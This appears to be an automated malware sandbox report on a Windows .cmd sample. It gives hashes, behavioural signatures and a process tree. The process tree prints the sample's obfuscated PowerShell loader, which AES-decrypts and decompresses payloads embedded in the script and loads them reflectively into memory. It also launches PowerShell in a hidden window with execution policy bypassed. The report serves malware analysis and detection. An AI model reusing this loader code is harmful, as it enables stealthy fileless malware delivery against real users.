Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
24-05-2024 13:30
Static task
static1
Behavioral task
behavioral1
Sample
c2ab16802765ebcfe21f21aabd351c846bbea9140835c23579f9d0e26f9bdf2c.cmd
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
c2ab16802765ebcfe21f21aabd351c846bbea9140835c23579f9d0e26f9bdf2c.cmd
Resource
win10v2004-20240426-en
General
-
Target
c2ab16802765ebcfe21f21aabd351c846bbea9140835c23579f9d0e26f9bdf2c.cmd
-
Size
111KB
-
MD5
934330a37a7b1380047366d135ff1423
-
SHA1
1cadd58c7e7475277d23b924b3dac8aad567bf44
-
SHA256
c2ab16802765ebcfe21f21aabd351c846bbea9140835c23579f9d0e26f9bdf2c
-
SHA512
844b523cb12393b97a9807fd4b5bd9b811a7482a4d9865a0b3c7ccdce889222671f86bd87cc8a0ec25abefe62d8e33a871434114847fea58bf8bc73bc411362a
-
SSDEEP
3072:/HPsUJ1lTMxqWITymQ57Leimw/gU0x1DzfsxciNpU3:XTWITymEeiWUxFy
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1768 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1768 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
cmd.exedescription pid process target process PID 2864 wrote to memory of 292 2864 cmd.exe cmd.exe PID 2864 wrote to memory of 292 2864 cmd.exe cmd.exe PID 2864 wrote to memory of 292 2864 cmd.exe cmd.exe PID 2864 wrote to memory of 2352 2864 cmd.exe cmd.exe PID 2864 wrote to memory of 2352 2864 cmd.exe cmd.exe PID 2864 wrote to memory of 2352 2864 cmd.exe cmd.exe PID 2864 wrote to memory of 1768 2864 cmd.exe powershell.exe PID 2864 wrote to memory of 1768 2864 cmd.exe powershell.exe PID 2864 wrote to memory of 1768 2864 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\c2ab16802765ebcfe21f21aabd351c846bbea9140835c23579f9d0e26f9bdf2c.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵PID:292
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lqGtFYajP4dvsKIWnOQi409E1v8ult6DFNGJrf47kZE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x2DBEVvQmBOCho9gd+n1bw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $oKEyn=New-Object System.IO.MemoryStream(,$param_var); $ZXvXs=New-Object System.IO.MemoryStream; $rdMmY=New-Object System.IO.Compression.GZipStream($oKEyn, [IO.Compression.CompressionMode]::Decompress); $rdMmY.CopyTo($ZXvXs); $rdMmY.Dispose(); $oKEyn.Dispose(); $ZXvXs.Dispose(); $ZXvXs.ToArray();}function execute_function($param_var,$param2_var){ $pUJev=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oJbpm=$pUJev.EntryPoint; $oJbpm.Invoke($null, $param2_var);}$XSGCc = 'C:\Users\Admin\AppData\Local\Temp\c2ab16802765ebcfe21f21aabd351c846bbea9140835c23579f9d0e26f9bdf2c.cmd';$host.UI.RawUI.WindowTitle = $XSGCc;$WmqwT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XSGCc).Split([Environment]::NewLine);foreach ($VEuit in $WmqwT) { if ($VEuit.StartsWith('kJooVBlfXESpuyhzrHrv')) { $iEGsi=$VEuit.Substring(20); break; }}$payloads_var=[string[]]$iEGsi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:2352
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1768